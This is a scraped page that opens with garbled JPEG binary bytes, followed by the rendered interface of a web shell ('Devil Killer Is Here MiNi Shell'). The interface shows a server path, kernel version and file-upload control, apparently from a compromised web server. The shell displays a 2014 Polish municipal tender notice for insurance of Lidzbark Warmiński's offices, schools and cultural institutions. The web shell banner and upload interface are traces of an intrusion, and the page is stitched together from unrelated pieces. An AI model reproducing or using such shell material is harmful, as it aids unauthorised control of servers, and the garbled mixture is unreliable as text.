JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141210/404246-N-2014.html

<p class="kh_header"><b>Lidzbark Warmiński: Ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark Warmiński, jednostek organizacyjnych Gminy Miejskiej oraz gminnych instytucji kultury</b><br>
<b>Numer ogłoszenia: 404246 - 2014; data zamieszczenia: 10.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark Warmiński, jednostek organizacyjnych Gminy Miejskiej oraz gminnych instytucji kultury.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark Warmiński, jednostek organizacyjnych Gminy Miejskiej oraz gminnych instytucji kultury.

   Cały przedmiot zamówienia został podzielony na następujące części:

1) Część I zamówienia -  ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark Warmiński, jednostek organizacyjnych Gminy Miejskiej oraz gminnych instytucji kultury,                        
     w zakresie:
- ubezpieczenia mienia od ognia i innych zdarzeń losowych, 
- ubezpieczenia mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
- ubezpieczenia sprzętu elektronicznego od wszystkich ryzyk, 
- ubezpieczenia odpowiedzialności cywilnej, 
- ubezpieczenia szyb od stłuczenia, 
- ubezpieczenia następstw nieszczęśliwych wypadków, 
- ubezpieczenia maszyn od uszkodzeń od wszystkich ryzyk,

w następujących jednostkach:
1. Gmina Miejska Lidzbark Warmiński, ul. Świętochowskiego  14, Lidzbark Warmiński, NIP: 7431975709, REGON: 510743500,

2. Miejski Zespół Ekonomiczno - Administracyjny Szkół i Przedszkoli, ul. Poniatowskiego 22, Lidzbark Warmiński,  NIP: 7431020904, REGON: 510360175,

3. Ośrodek Sportu i Rekreacji, ul. Bartoszycka 24, Lidzbark Warmiński, NIP: 7431692779, REGON: 000331240,

4. Miejska Biblioteka Publiczna, ul. Ratuszowa 4, Lidzbark Warmiński, NIP: 7431029940, REGON: 001323745,

5.Lidzbarski Dom Kultury, ul. Słowackiego 4, Lidzbark Warmiński,  NIP: 7431312535, REGON: 000791303,

6. Przedszkole Miejskie nr 5, ul. Wodna 9, Lidzbark Warmiński, NIP: 7431799661, REGON: 170973110,

7. Szkoła Podstawowa nr 1, ul. Szkolna 2, Lidzbark Warmiński,  NIP: 7431771757, REGON: 007013141,

8. Szkoła Podstawowa nr 3, ul. Lipowa 17a, Lidzbark Warmiński, NIP: 7431771728, REGON: 007008476,

9. Gimnazjum nr 1, ul. Szkolna 2a,  Lidzbark Warmiński,  NIP: 7431771763, REGON: 170769668, 

10. Gimnazjum nr 2, ul. Polna 36, Lidzbark Warmiński ,  NIP: 743171740, REGON: 170769674 ,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, 11-100 Lidzbark Warmiński,  NIP: 7431949178, REGON: 510526032,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, Lidzbark Warmiński,  NIP: 7431949178, REGON: 510045829,

12. Miejski Ośrodek Pomocy Społecznej, ul. Góreckiego 7, Lidzbark Warmiński,  NIP: 7431076744, REGON: 004445093.

2) Część II zamówienia -  ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark 
      Warmiński, jednostek organizacyjnych Gminy Miejskiej oraz gminnych instytucji kultury,                          
      w zakresie:
- ubezpieczenia odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych,
- ubezpieczenie autocasco,
- ubezpieczenia NNW kierowcy i pasażerów,
- ubezpieczenia assistance,

w następujących jednostkach:
1. Gmina Miejska Lidzbark Warmiński, ul. Świętochowskiego  14, Lidzbark Warmiński, NIP: 7431975709, REGON: 510743500,

2. Miejski Zespół Ekonomiczno - Administracyjny Szkół i Przedszkoli, ul. Poniatowskiego 22, Lidzbark Warmiński,  NIP: 7431020904, REGON: 510360175,

3. Ośrodek Sportu i Rekreacji, ul. Bartoszycka 24, Lidzbark Warmiński, NIP: 7431692779, REGON: 000331240,

4. Miejska Biblioteka Publiczna, ul. Ratuszowa 4, Lidzbark Warmiński, NIP: 7431029940, REGON: 001323745,

5.Lidzbarski Dom Kultury, ul. Słowackiego 4, Lidzbark Warmiński,  NIP: 7431312535, REGON: 000791303,

6. Przedszkole Miejskie nr 5, ul. Wodna 9, Lidzbark Warmiński, NIP: 7431799661, REGON: 170973110,

7. Szkoła Podstawowa nr 1, ul. Szkolna 2, Lidzbark Warmiński,  NIP: 7431771757, REGON: 007013141,

8. Szkoła Podstawowa nr 3, ul. Lipowa 17a, Lidzbark Warmiński, NIP: 7431771728, REGON: 007008476,

9. Gimnazjum nr 1, ul. Szkolna 2a,  Lidzbark Warmiński,  NIP: 7431771763, REGON: 170769668, 

10. Gimnazjum nr 2, ul. Polna 36, Lidzbark Warmiński ,  NIP: 743171740, REGON: 170769674 ,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, 11-100 Lidzbark Warmiński,  NIP: 7431949178, REGON: 510526032,

11. Zespół Szkolno - Przedszkolny, ul. Polna 36, Lidzbark Warmiński,  NIP: 7431949178, REGON: 510045829,

12. Miejski Ośrodek Pomocy Społecznej, ul. Góreckiego 7, Lidzbark Warmiński,  NIP: 7431076744, REGON: 004445093.

2. UWAGA: Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 3 - Program 
    Ubezpieczenia

3. UWAGA: Zamawiający nie dopuszcza składania ofert wariantowych.

4. Wykonawca może złożyć ofertę na wszystkie części zamówienia bądź też na wybrane części     
    zamówienia. Każda z części będzie oceniana odrębnie.


5. Wymagania określone przez Zamawiającego dotyczące przedmiotu zamówienia:

1) Zamawiający wymaga, aby Wykonawca udzielał pełnomocnikowi Zamawiającego - Maximus Broker Sp.                     
    z o.o. informacji na temat bieżącej likwidacji szkód Zamawiającego.
2) Zamawiający wymaga, aby Zamawiający, jednostki organizacyjne Zamawiającego i gminne instytucje kultury 
    nie były zobowiązane do pokrywania strat Wykonawcy działającego w formie towarzystwa ubezpieczeń 
    wzajemnych przez wnoszenie dodatkowej składki, zgodnie z art. 44 ust. 2 Ustawy z dnia 22 maja 2003 r.                 
    o działalności ubezpieczeniowej (Dz. U. z 2013 r. poz. 950).
3) Wykonawca musi posiadać ogólne (szczególne) warunki ubezpieczenia, zwane dalej OWU, wszystkich 
    ubezpieczeń określonych w przedmiocie zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że posiada 
      zezwolenie na prowadzenie działalności ubezpieczeniowej, o którym mowa w art. 6 ust. 1 ustawy z dnia 22 
      maja 2003 roku o działalności ubezpieczeniowej (Dz. U. z 2013 r. poz. 950), tzn. kopia zezwolenia Komisji   
      Nadzoru Finansowego, bądź Ministra Finansów (jeżeli uzyskał zezwolenie przed 1 stycznia 2004 r.) na 
      prowadzenie działalności ubezpieczeniowej, lub potwierdzenie Komisji Nadzoru Finansowego o posiadaniu 
      uprawnień do prowadzenia działalności ubezpieczeniowej (jeżeli rozpoczął działalność przed 28-08-1990 r.), 
      lub inny dokument jak zezwolenie właściwego organu na wykonywanie działalności ubezpieczeniowej                          
      w państwie członkowskim Unii Europejskiej, w którym Wykonawca ma siedzibę, potwierdzający posiadanie 
      uprawnień do prowadzenia działalności ubezpieczeniowej w zakresie wszystkich grup ryzyk objętych 
      przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku udziału                       
      w postępowaniu.

      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży oświadczenie                          
      o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku udziału                       
      w postępowaniu.

      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży oświadczenie                          
      o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku udziału                       
      w postępowaniu.

      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży oświadczenie                          
      o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww. warunku udziału                       
      w postępowaniu.

      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży oświadczenie                          
      o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do  SIWZ oraz podpisany przez Wykonawcę,
2. Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika 
      bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru lub  z centralnej ewidencji i informacji 
      o działalności gospodarczej.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie 
      zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 
     zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia 
     publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80.00</li>
<li>2 - Zaakceptowanie klauzul dodatkowych - 20.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Część I Zamówienia: Zamawiający przewiduje możliwość wprowadzenia niżej wymienionych zmian postanowień zawartej umowy             w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
1)	zmiany terminów płatności, wysokości i liczby rat składki - taka zmiana zostanie dokonana, bez dodatkowej zwyżki składki, na pisemny wniosek Zamawiającego złożony przed upływem terminu płatności składki przewidzianym w umowie oraz dokumentach ubezpieczenia po uprzedniej zgodzie Wykonawcy;
2)	zmiany wysokości składki lub raty składki w ubezpieczeniach majątkowych w przypadku zmniejszenia  sumy ubezpieczenia - w przypadku zmiany wartości majątku w okresie ubezpieczenia oraz w okresie pomiędzy zebraniem danych a rozpoczęciem okresu ubezpieczenia. Składka będzie rozliczana zgodnie                   z określonymi w specyfikacji zapisami klauzuli warunków i taryf oraz klauzul automatycznego pokrycia;
3)	zmiany wysokości składki lub raty składki w ubezpieczeniu odpowiedzialności cywilnej i ubezpieczeniach na zawartych w systemie na pierwsze ryzyko w wyniku podwyższenia wysokości sumy gwarancyjnej                    i zmiany limitów odpowiedzialności. Składka będzie rozliczana zgodnie z, określonymi w specyfikacji, zapisami klauzuli warunków i taryf;
4)	zmiany wysokości składki w ubezpieczeniu mienia od ognia i innych zdarzeń losowych w przypadku zmiany sumy ubezpieczenia budynków i budowli - w przypadku zmiany rodzaju wartości budynków/budowli (np. z wartości księgowej brutto na wartość odtworzeniową). Składka będzie rozliczana zgodnie z, określonymi w specyfikacji, zapisami klauzuli warunków i taryf;
5)	zmiany wysokości składki w przypadku wprowadzenia na usługi ubezpieczeniowe podatku od towarów               i usług (VAT) lub zmiany stawki tego podatku, jeżeli będzie miał zastosowanie do usług ubezpieczeniowych. Składka ulega podwyższeniu o kwotę naliczonego podatku VAT;  
6)	zmiany dotyczące liczby jednostek organizacyjnych Zamawiającego podlegających ubezpieczeniu i ich formy prawnej - w przypadku:
a)	powstania nowych jednostek (w wyniku połączenia lub wyodrębniania) - składka będzie rozliczana bądź naliczana zgodnie z, określonymi w specyfikacjami, zapisami klauzuli warunków i taryf;
b)	 przekształcenia jednostki - warunki ubezpieczenia będą nie gorsze jak dla jednostki pierwotnej;  
c)	likwidacji jednostki - jeżeli jednostka zostanie wyłączona z ochrony ubezpieczeniowej - wniesiona składka za ubezpieczenie zostanie zwrócona Gminie Miejskiej Lidzbark Warmiński w odpowiedniej wysokości, wynikającej z proporcji składki wniesionej za cały okres ubezpieczenia do faktycznego okresu ubezpieczenia jednostki. Jeżeli mienie likwidowanej jednostki zostanie przekazane innym jednostkom Zamawiającego, to zostanie ono objęte ochroną przez Wykonawcę (po wniesieniu odpowiedniej składki) na warunkach ubezpieczenia nie gorszych jak dla jednostki zlikwidowanej.
7)	zmiany korzystnej dla Zamawiającego zmiany zakresu ubezpieczenia wynikające ze zmian OWU Wykonawcy oraz wprowadzenia nowych klauzul za zgodą Zamawiającego i Wykonawcy bez dodatkowej zwyżki składki;
8)	zmiany zakresu ubezpieczenia wynikająca ze zmian przepisów prawnych.


Część II Zamówienia:
Zamawiający przewiduje możliwość wprowadzenia niżej wymienionych zmian postanowień zawartej umowy                         w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: 
1)	zmiany terminów płatności, wysokości i liczby rat składki - taka zmiana zostanie dokonana, bez dodatkowej zwyżki składki, na pisemny wniosek Zamawiającego złożony przed upływem terminu płatności składki przewidzianym w umowie oraz dokumentach ubezpieczenia po uprzedniej zgodzie Wykonawcy;
2)	zmiany wysokości składki w ubezpieczeniach komunikacyjnych w przypadku zmiany sumy ubezpieczenia 
w ubezpieczeniu autocasco oraz w przypadku sprzedaży lub likwidacji pojazdów przez Zamawiającego (jednostki Zamawiającego) i zmiany posiadacza pojazdów w tym okresie. Ostatnim dniem umożliwiającym ubezpieczenie pojazdu na warunkach umowy o udzielenie zamówienia publicznego jest ostatni dzień obowiązywania umowy to jest 31.12.2016 r. Maksymalnie okres ubezpieczenia pojazdów zakończy się dnia 30.12.2017 r. Składka będzie rozliczana zgodnie z zapisami klauzuli warunków i taryf;
3)	zmiany wysokości składki w przypadku wprowadzenia na usługi ubezpieczeniowe podatku od towarów                   i usług (VAT) lub zmiany stawki tego podatku, jeżeli będzie miał zastosowanie do usług ubezpieczeniowych. Składka ulega podwyższeniu o kwotę naliczonego podatku VAT; 
4)	zmiany dotyczące liczby jednostek organizacyjnych Zamawiającego podlegających ubezpieczeniu i ich    
       formy prawnej - w przypadku:
a)	powstania nowych jednostek (w wyniku połączenia lub wyodrębniania) - składka będzie rozliczana bądź naliczana zgodnie z, określonymi w specyfikacjami, zapisami klauzuli warunkó i taryf;
b)	przekształcenia jednostki - warunki ubezpieczenia będą nie gorsze jak dla jednostki pierwotnej;  
c)	likwidacji jednostki - jeżeli jednostka zostanie wyłączona z ochrony ubezpieczeniowej - wniesiona składka za ubezpieczenie zostanie zwrócona Gminie Miejskiej Lidzbark Warmiński w odpowiedniej wysokości, wynikającej z proporcji składki wniesionej za cały okres ubezpieczenia do faktycznego okresu ubezpieczenia jednostki. Jeżeli mienie likwidowanej jednostki zostanie przekazane innym jednostkom Zamawiającego, to zostanie ono objęte ochroną przez Wykonawcę (po wniesieniu odpowiedniej składki) na warunkach ubezpieczenia nie gorszych jak dla jednostki zlikwidowanej.
5)	zmiany korzystnej dla Zamawiającego zmiany zakresu ubezpieczenia wynikające ze zmian OWU 
        Wykonawcy oraz  wprowadzenia nowych klauzul za zgodą Zamawiającego i Wykonawcy bez dodatkowej 
        zwyżki składki;
6)	zmiany zakresu ubezpieczenia wynikająca ze zmian przepisów prawnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2014 godzina 11:00, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1) Część I zamówienia -  ubezpieczenie mienia i odpowiedzialności Gminy Miejskiej Lidzbark 
    Warmiński, jednostek organizacyjnych Gminy Miejskiej oraz gminnych instytucji kultury.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia:
- ubezpieczenia mienia od ognia i innych zdarzeń losowych, 
- ubezpieczenia mienia od kradzieży z włamaniem i rabunku oraz od kradzieży zwykłej,
- ubezpieczenia sprzętu elektronicznego od wszystkich ryzyk, 
- ubezpieczenia odpowiedzialności cywilnej, 
- ubezpieczenia szyb od stłuczenia, 
- ubezpieczenia następstw nieszczęśliwych wypadków, 
- ubezpieczenia maszyn od uszkodzeń od wszystkich ryzyk,

w następujących jednostkach organizacyjnych:
1. Gmina Miejska Lidzbark Warmiński, ul. Świętochowskiego  14, Lidzbark Warmiński, NIP: 7431975709, REGON: 510743500,

